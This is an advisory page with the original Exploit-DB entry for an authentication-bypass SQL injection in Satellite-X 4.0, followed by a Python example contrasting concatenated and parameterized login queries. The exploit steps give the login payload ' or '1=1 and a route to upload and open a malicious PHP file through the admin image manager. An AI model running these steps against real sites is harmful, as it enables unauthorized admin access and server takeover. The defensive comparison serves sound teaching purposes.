Vendor: Satellite-X
By: indoushka
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Satellite-X
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability

The admin login form is vulnerable to SQL injection. An attacker can bypass authentication by entering ' or '1=1 as the username and 1nd0u as the password. This gives access to the admin page, where malicious files can be uploaded to the server. The attacker can then reach the uploaded file at http://127.0.0.1/satallitex/img/Ch99.php.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
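
The mitigation above, as an added example (not code from Satellite-X or from the original advisory): a login check built by string concatenation next to the same check with input validation and bound parameters, run against an in-memory SQLite database. The table layout, the query shape, the allow-list pattern and all function names are assumptions made for illustration; the application's real query is not shown on this page.

```python
import hashlib
import re
import sqlite3

USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")  # assumed allow-list for login names


def digest(password):
    # Unsalted SHA-256 keeps the demo short; real code should use a salted password KDF.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    # Constructed sample data: one admin account in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO admins VALUES (?, ?)", ("admin", digest("constructed-secret")))
    return db


def login_concatenated(db, username, password):
    # Weak form (assumed query shape): the username becomes part of the SQL text,
    # so a quote in it changes the WHERE clause instead of being compared as data.
    sql = ("SELECT username FROM admins WHERE pw_hash = '" + digest(password)
           + "' AND username = '" + username + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password, validate=True):
    # Validation: reject names outside the allow-list before touching the database.
    if validate and not USERNAME_RE.fullmatch(username):
        return False
    # Placeholders keep both values as data; they are never parsed as SQL.
    sql = "SELECT username FROM admins WHERE pw_hash = ? AND username = ?"
    return db.execute(sql, (digest(password), username)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # Second pair is the username/password from the advisory.
    for user, pw in [("admin", "constructed-secret"), ("' or '1=1", "1nd0u")]:
        print(repr(user), login_concatenated(db, user, pw), login_parameterized(db, user, pw))
```

With validate=False the parameterized check still rejects the advisory's input, which shows that the bound parameters, not the allow-list, are what close the injection; the allow-list is defense in depth.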

Exploit-DB raw data:

========================================================================================                  
| # Title    : Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iqs3cur1ty.com                                                                              
| # Web Site :                                                                                                                                   
| # Dork     : 2009 © Satellite-X 
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)       
| # Bug      : (Auth Bypass) SQL Injection                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1 - http://127.0.0.1/satallitex/admin/index.php
 
 2 - username : ' or '1=1  

     password : 1nd0u
    
 3 - Go To http://127.0.0.1/satallitex/admin/index.php?config=imagesman (2 Upload Ev!l)
 
 4 - http://127.0.0.1/satallitex/img/Ch99.php (2 Find Ev!l)

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------